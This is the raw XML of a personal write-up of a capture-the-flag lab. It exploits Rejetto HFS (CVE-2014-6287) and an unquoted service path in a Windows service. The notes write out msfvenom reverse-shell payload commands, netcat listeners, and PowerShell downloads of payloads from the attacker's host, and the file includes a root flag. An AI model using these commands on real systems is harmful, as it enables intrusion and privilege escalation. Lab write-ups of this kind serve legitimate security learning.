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DB66" w14:textId="10271A9C" w:rsidR="00266677" w:rsidRDefault="006112B3">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="006112B3">
        <w:t>Who is the employee of the month?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Checked the page source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05255DCD" w14:textId="7A8E3354" w:rsidR="006112B3" w:rsidRDefault="006112B3">
      <w:r>
        <w:t>Bill Harper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C54176D" w14:textId="01138F63" w:rsidR="006112B3" w:rsidRDefault="006112B3"/>
    <w:p w14:paraId="667073D2" w14:textId="0FF794C1" w:rsidR="006112B3" w:rsidRDefault="006112B3">
      <w:r>
        <w:t># Ports found from nmap of 10.10.30.37</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2812707A" w14:textId="7480CCF0" w:rsidR="006112B3" w:rsidRDefault="006112B3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="780BD02B" wp14:editId="38CB90DA">
            <wp:extent cx="5943600" cy="31692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19E9" w14:textId="65A630D8" w:rsidR="006112B3" w:rsidRDefault="006112B3"/>
    <w:p w14:paraId="33ACC42F" w14:textId="1DD6FB67" w:rsidR="006112B3" w:rsidRDefault="006112B3">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="006112B3">
        <w:t>Take a look at the other web server. What file server is running?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B775FE7" w14:textId="37EB2DDB" w:rsidR="006112B3" w:rsidRDefault="006112B3">
      <w:r>
        <w:t>Rejetto file server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544B0632" w14:textId="5D398B9F" w:rsidR="006112B3" w:rsidRDefault="006112B3"/>
    <w:p w14:paraId="03AE3C57" w14:textId="57F822B0" w:rsidR="006112B3" w:rsidRDefault="006112B3">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="006112B3">
        <w:t>What is the CVE number to exploit this file server?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6557B1BF" w14:textId="78FC68A1" w:rsidR="006112B3" w:rsidRDefault="006112B3">
      <w:r w:rsidRPr="006112B3">
        <w:t>2014-6287</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0646F3B3" w14:textId="6AFFD119" w:rsidR="006112B3" w:rsidRDefault="006112B3"/>
    <w:p w14:paraId="73059953" w14:textId="31F59B4C" w:rsidR="006112B3" w:rsidRDefault="006112B3">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="006112B3">
        <w:t>Use Metasploit to get an initial shell. What is the user flag?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD5A50F" w14:textId="606BA260" w:rsidR="006112B3" w:rsidRDefault="006112B3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CF615A5" wp14:editId="633AC385">
            <wp:extent cx="5943600" cy="3136265"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="2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2DA5" w14:textId="283CEA04" w:rsidR="006112B3" w:rsidRDefault="006112B3"/>
    <w:p w14:paraId="43EA59DE" w14:textId="12CC9FC8" w:rsidR="006112B3" w:rsidRDefault="006112B3">
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1A73DA" w14:textId="22401A0E" w:rsidR="006112B3" w:rsidRDefault="006112B3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0512FA2E" wp14:editId="137C4A6E">
            <wp:extent cx="5943600" cy="1697990"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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587D" w14:textId="6F8A67EE" w:rsidR="006112B3" w:rsidRDefault="006112B3"/>
    <w:p w14:paraId="2BC20DF2" w14:textId="18B7769D" w:rsidR="006112B3" w:rsidRDefault="006112B3">
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D75A953" w14:textId="1572D2F9" w:rsidR="00723A70" w:rsidRDefault="006112B3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="709FD4EF" wp14:editId="3EB8C5BE">
            <wp:extent cx="5467350" cy="1838325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="4" name="Picture 4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3412" w14:textId="7347E2E5" w:rsidR="00723A70" w:rsidRDefault="007D0B3A">
      <w:r>
        <w:t xml:space="preserve"># set as a background and </w:t>
      </w:r>
      <w:r w:rsidR="00D93BBF">
        <w:t>switched to use multi/handler</w:t>
      </w:r>
      <w:r w:rsidR="00B542BB">
        <w:t>. Set the following parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D86447" w14:textId="55420F24" w:rsidR="00B542BB" w:rsidRDefault="00B542BB">
      <w:r>
        <w:t xml:space="preserve">Set payload </w:t>
      </w:r>
      <w:r w:rsidR="00AA130D">
        <w:t>windows/shell</w:t>
      </w:r>
      <w:r w:rsidR="000A2A0D">
        <w:t>s/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624BBF1A" w14:textId="2ABDB4AA" w:rsidR="000A2A0D" w:rsidRDefault="000A2A0D">
      <w:r>
        <w:t xml:space="preserve">Set LHOST </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1140D9DE" w14:textId="7114563F" w:rsidR="000A2A0D" w:rsidRDefault="000A2A0D">
      <w:r>
        <w:t>Set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343DAD24" w14:textId="41845A4C" w:rsidR="00937C34" w:rsidRDefault="00937C34">
      <w:r>
        <w:t>Run -j to run in the background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D88EAE2" w14:textId="7BAED4DB" w:rsidR="00937C34" w:rsidRDefault="00937C34">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="00960D84">
        <w:t xml:space="preserve">Used commands load powershell and powershell_shell to load the </w:t>
      </w:r>
      <w:r w:rsidR="00B73883">
        <w:t>PowerShell terminal.  U</w:t>
      </w:r>
      <w:r w:rsidR="00C5778C">
        <w:t xml:space="preserve">ploaded the PowerUp.ps1 file after downloading from </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00373E3B" w:rsidRPr="00425795">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B210ED6" w14:textId="0A6919AD" w:rsidR="00373E3B" w:rsidRDefault="004A09E9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="523A4375" wp14:editId="203ACA21">
            <wp:extent cx="4419600" cy="876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279" w14:textId="1E6DC7BE" w:rsidR="004A09E9" w:rsidRDefault="004A09E9"/>
    <w:p w14:paraId="74947A32" w14:textId="62AFB2F7" w:rsidR="004A09E9" w:rsidRDefault="00B004CC">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00B004CC">
        <w:t>What is the name of the service which shows up as an unquoted service path vulnerability?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09719A01" w14:textId="652759B6" w:rsidR="00B004CC" w:rsidRDefault="008562DC">
      <w:r w:rsidRPr="008562DC">
        <w:t>AdvancedSystemCareService9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A98B49" w14:textId="50514623" w:rsidR="008562DC" w:rsidRDefault="008562DC"/>
    <w:p w14:paraId="58FC85A7" w14:textId="17631C1D" w:rsidR="008562DC" w:rsidRDefault="00B079D6">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidR="00015A85">
        <w:t>cd the directory to C:/Program Files (x86)/IObit</w:t>
      </w:r>
      <w:r w:rsidR="000F2F0D">
        <w:t xml:space="preserve">.  Generated exploit to ASCService.exe using </w:t>
      </w:r>
      <w:r w:rsidR="00075CC4" w:rsidRPr="00075CC4">
        <w:t>msfvenom -p windows/shell_reverse_tcp LHOST=10.9.9.34 LPORT=4444 -e x86/shikata_ga_nai -f exe -o ASCService.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C397A49" w14:textId="77777777" w:rsidR="00F61761" w:rsidRDefault="00F61761"/>
    <w:p w14:paraId="75351F86" w14:textId="37617E69" w:rsidR="00DD2180" w:rsidRDefault="00F61761">
      <w:r>
        <w:t xml:space="preserve"># Used </w:t>
      </w:r>
      <w:r w:rsidR="004D6BF8">
        <w:t xml:space="preserve">sc stop </w:t>
      </w:r>
      <w:r w:rsidR="004D6BF8" w:rsidRPr="004D6BF8">
        <w:t>AdvancedSystemCareService9</w:t>
      </w:r>
      <w:r w:rsidR="004D6BF8">
        <w:t xml:space="preserve"> to stop the service in the shell and uploaded the file ASCService.exe</w:t>
      </w:r>
      <w:r w:rsidR="008C1AB4">
        <w:t xml:space="preserve"> to overwrite the original file.  Next, ran sc start </w:t>
      </w:r>
      <w:r w:rsidR="008C1AB4" w:rsidRPr="008C1AB4">
        <w:t>AdvancedSystemCareService9</w:t>
      </w:r>
      <w:r w:rsidR="008C1AB4">
        <w:t xml:space="preserve"> to open a shell</w:t>
      </w:r>
      <w:r w:rsidR="00DD2180">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323B45E2" w14:textId="0A50DFAA" w:rsidR="00DD2180" w:rsidRDefault="00DD2180">
      <w:r>
        <w:t xml:space="preserve">Results from Administrator/root.txt – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8BC106" w14:textId="6CFB84FF" w:rsidR="00DD2180" w:rsidRDefault="00DD2180">
      <w:r>
        <w:t xml:space="preserve">Flag </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2180">
        <w:t>9af5f314f57607c00fd09803a587db80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082A0C1F" w14:textId="501FC0E0" w:rsidR="003E54E4" w:rsidRDefault="003E54E4"/>
    <w:p w14:paraId="6D373361" w14:textId="64F0D8EE" w:rsidR="003E54E4" w:rsidRDefault="00D967E5">
      <w:r>
        <w:t># Gaining access without Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BF0FA3" w14:textId="0A8A4DBF" w:rsidR="00D967E5" w:rsidRDefault="00D967E5" w:rsidP="00D967E5">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="0002041C">
        <w:t xml:space="preserve">downloaded the Rejetto Http File Server exploit </w:t>
      </w:r>
      <w:r w:rsidR="004B2E27">
        <w:t>39161 from Exploit.DB</w:t>
      </w:r>
      <w:r w:rsidR="00031187">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="006A0DAA">
        <w:t>changed IP and ports to local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B950F6" w14:textId="11D5E10F" w:rsidR="004B2E27" w:rsidRDefault="004B2E27" w:rsidP="00D967E5">
      <w:r>
        <w:t>- downloaded the ncat.exe and renamed nc.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5527AA4E" w14:textId="3081E622" w:rsidR="00031187" w:rsidRDefault="006A0DAA" w:rsidP="00D967E5">
      <w:r>
        <w:t xml:space="preserve">- started a web server using </w:t>
      </w:r>
      <w:r w:rsidR="00DB4736">
        <w:t>sudo python -m SimpleHTTPServer 80 command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02667FE5" w14:textId="3BADFB0B" w:rsidR="00DB4736" w:rsidRDefault="00857324" w:rsidP="00D967E5">
      <w:r>
        <w:t>- started a netcat using nc -lvnp 9001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C84B163" w14:textId="62282270" w:rsidR="00857324" w:rsidRDefault="00857324" w:rsidP="00D967E5">
      <w:r>
        <w:t>- ran the exploit using python ndg.py 10.10.164.152</w:t>
      </w:r>
      <w:r w:rsidR="00C5692E">
        <w:t xml:space="preserve"> 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BE1CBF" w14:textId="52E283C3" w:rsidR="00C5692E" w:rsidRDefault="00C5692E" w:rsidP="00D967E5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67721EE7" wp14:editId="0E0E3A62">
            <wp:extent cx="5943600" cy="3275965"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="6" name="Picture 6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computer,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B897" w14:textId="7CE0422E" w:rsidR="00C5692E" w:rsidRDefault="00C5692E" w:rsidP="00D967E5"/>
    <w:p w14:paraId="4257D579" w14:textId="6477D211" w:rsidR="00C5692E" w:rsidRDefault="009F2723" w:rsidP="00D967E5">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="000D77B3" w:rsidRPr="000D77B3">
        <w:t>What powershell -c command could we run to manually find out the service name?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C2C24C" w14:textId="55EDDD9C" w:rsidR="000D77B3" w:rsidRDefault="000A0AB4" w:rsidP="00D967E5">
      <w:r w:rsidRPr="000A0AB4">
        <w:t>powershell -c "Get-Service"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215B8AA2" w14:textId="4FE21DFA" w:rsidR="000A0AB4" w:rsidRDefault="000A0AB4" w:rsidP="00D967E5"/>
    <w:p w14:paraId="30A4D158" w14:textId="6A026E91" w:rsidR="000A0AB4" w:rsidRDefault="00A42C5F" w:rsidP="00D967E5">
      <w:r>
        <w:t xml:space="preserve"># uploaded winPEAS.exe to </w:t>
      </w:r>
      <w:r w:rsidR="00461E83">
        <w:t xml:space="preserve">C:/Users/bill/Desktop using powershell -c wget </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidR="004E468A" w:rsidRPr="00425795">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;local IP&gt;:80/winPEAS.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004E468A">
        <w:t xml:space="preserve"> -outfile winPEAS.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A589AEC" w14:textId="6EC6108C" w:rsidR="004E468A" w:rsidRDefault="00362EB6" w:rsidP="00D967E5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AF277A6" wp14:editId="15942116">
            <wp:extent cx="5943600" cy="35693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B69B" w14:textId="21EB39F1" w:rsidR="00362EB6" w:rsidRDefault="00362EB6" w:rsidP="00D967E5"/>
    <w:p w14:paraId="581AA007" w14:textId="69A675CB" w:rsidR="00362EB6" w:rsidRDefault="009C224C" w:rsidP="00D967E5">
      <w:r>
        <w:t># ran winPEAS.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3201CAB5" w14:textId="09CA530E" w:rsidR="009C224C" w:rsidRDefault="009C224C" w:rsidP="00D967E5"/>
    <w:p w14:paraId="31E0F6A3" w14:textId="08CC9452" w:rsidR="009C224C" w:rsidRDefault="009C224C" w:rsidP="00D967E5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="092D3E62" wp14:editId="18EAF52E">
            <wp:extent cx="5943600" cy="1285875"/>
            <wp:effectExtent l="0" t="0" r="0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C084" w14:textId="2FEE0986" w:rsidR="009C224C" w:rsidRDefault="009C224C" w:rsidP="00D967E5"/>
    <w:p w14:paraId="59F033E4" w14:textId="03AC2B16" w:rsidR="009C224C" w:rsidRDefault="003A7E71" w:rsidP="00D967E5">
      <w:r>
        <w:t xml:space="preserve"># generated a new </w:t>
      </w:r>
      <w:r w:rsidR="00825446">
        <w:t xml:space="preserve">exploit with </w:t>
      </w:r>
      <w:r w:rsidR="00825446" w:rsidRPr="00825446">
        <w:t>sfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -e x86/shikata_ga_nai -f exe -o ASCService.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F532EE" w14:textId="072128A0" w:rsidR="00825446" w:rsidRDefault="00825446" w:rsidP="00D967E5"/>
    <w:p w14:paraId="1E203A53" w14:textId="34A23FC4" w:rsidR="00B53991" w:rsidRDefault="00B53991" w:rsidP="00D967E5">
      <w:r>
        <w:t xml:space="preserve"># Copied ASCService.exe file to shell using </w:t>
      </w:r>
      <w:r w:rsidRPr="00B53991">
        <w:t>powershell -c wget "http://</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;local IP&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B53991">
        <w:t>:80/ASCService.exe -outfile "ASCService.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3D844B" w14:textId="59273F22" w:rsidR="00F57D49" w:rsidRDefault="00A460EB" w:rsidP="00D967E5">
      <w:r>
        <w:t xml:space="preserve">- used sc stop </w:t>
      </w:r>
      <w:r w:rsidR="00931DF2" w:rsidRPr="00931DF2">
        <w:t>AdvancedSystemCareService9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ADE9B8" w14:textId="568B266F" w:rsidR="00931DF2" w:rsidRDefault="00931DF2" w:rsidP="00D967E5">
      <w:r>
        <w:t>- copied the ASCService.exe to Advanced SystemCare folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334E4B4A" w14:textId="542E5FF3" w:rsidR="00931DF2" w:rsidRDefault="00931DF2" w:rsidP="00D967E5">
      <w:r>
        <w:t xml:space="preserve">- setup netcat to listening port </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1223D162" w14:textId="1407A566" w:rsidR="00931DF2" w:rsidRDefault="00931DF2" w:rsidP="00D967E5">
      <w:r>
        <w:t xml:space="preserve">- used sc start </w:t>
      </w:r>
      <w:r w:rsidRPr="00931DF2">
        <w:t>AdvancedSystemCareService9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0460EDC2" w14:textId="5B8EB75D" w:rsidR="00931DF2" w:rsidRDefault="00E535E8" w:rsidP="00D967E5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50EA2568" wp14:editId="41A9EE1C">
            <wp:extent cx="5524500" cy="272415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4394" w14:textId="36B6419C" w:rsidR="00AF09DC" w:rsidRDefault="00AF09DC" w:rsidP="00D967E5"/>
    <w:p w14:paraId="08FFC409" w14:textId="10651B16" w:rsidR="00AF09DC" w:rsidRDefault="00AF09DC" w:rsidP="00D967E5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11CCC542" wp14:editId="77B82A2C">
            <wp:extent cx="4924425" cy="6572250"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="10" name="Picture 10" descr="A picture containing text, plaq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plaque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E7F62"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="75F80E86"/>
    <w:lvl w:ilvl="0" w:tplc="FC8AE59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B3"/>
    <w:rsid w:val="00015A85"/>
    <w:rsid w:val="0002041C"/>
    <w:rsid w:val="00031187"/>
    <w:rsid w:val="00067B8F"/>
    <w:rsid w:val="00075CC4"/>
    <w:rsid w:val="000A0AB4"/>
    <w:rsid w:val="000A2A0D"/>
    <w:rsid w:val="000D77B3"/>
    <w:rsid w:val="000F2F0D"/>
    <w:rsid w:val="00266677"/>
    <w:rsid w:val="00362EB6"/>
    <w:rsid w:val="00373E3B"/>
    <w:rsid w:val="003A7E71"/>
    <w:rsid w:val="003E54E4"/>
    <w:rsid w:val="00461E83"/>
    <w:rsid w:val="004A09E9"/>
    <w:rsid w:val="004B2E27"/>
    <w:rsid w:val="004D6BF8"/>
    <w:rsid w:val="004E468A"/>
    <w:rsid w:val="006112B3"/>
    <w:rsid w:val="006A0DAA"/>
    <w:rsid w:val="00723A70"/>
    <w:rsid w:val="007D0B3A"/>
    <w:rsid w:val="00825446"/>
    <w:rsid w:val="008562DC"/>
    <w:rsid w:val="00857324"/>
    <w:rsid w:val="008C1AB4"/>
    <w:rsid w:val="00931DF2"/>
    <w:rsid w:val="00937C34"/>
    <w:rsid w:val="00960D84"/>
    <w:rsid w:val="0099764D"/>
    <w:rsid w:val="009C224C"/>
    <w:rsid w:val="009F2723"/>
    <w:rsid w:val="00A42C5F"/>
    <w:rsid w:val="00A460EB"/>
    <w:rsid w:val="00AA130D"/>
    <w:rsid w:val="00AF09DC"/>
    <w:rsid w:val="00B004CC"/>
    <w:rsid w:val="00B079D6"/>
    <w:rsid w:val="00B53991"/>
    <w:rsid w:val="00B542BB"/>
    <w:rsid w:val="00B73883"/>
    <w:rsid w:val="00C5692E"/>
    <w:rsid w:val="00C5778C"/>
    <w:rsid w:val="00D42C1F"/>
    <w:rsid w:val="00D93BBF"/>
    <w:rsid w:val="00D967E5"/>
    <w:rsid w:val="00DB4736"/>
    <w:rsid w:val="00DD2180"/>
    <w:rsid w:val="00E535E8"/>
    <w:rsid w:val="00F57D49"/>
    <w:rsid w:val="00F6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E405"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{957BBE50-62E9-4ED3-9570-70218C0F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E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owerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps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6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Gayden</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nick Gayden</cp:lastModifiedBy>
  <cp:revision>51</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-12T15:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-14T12:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>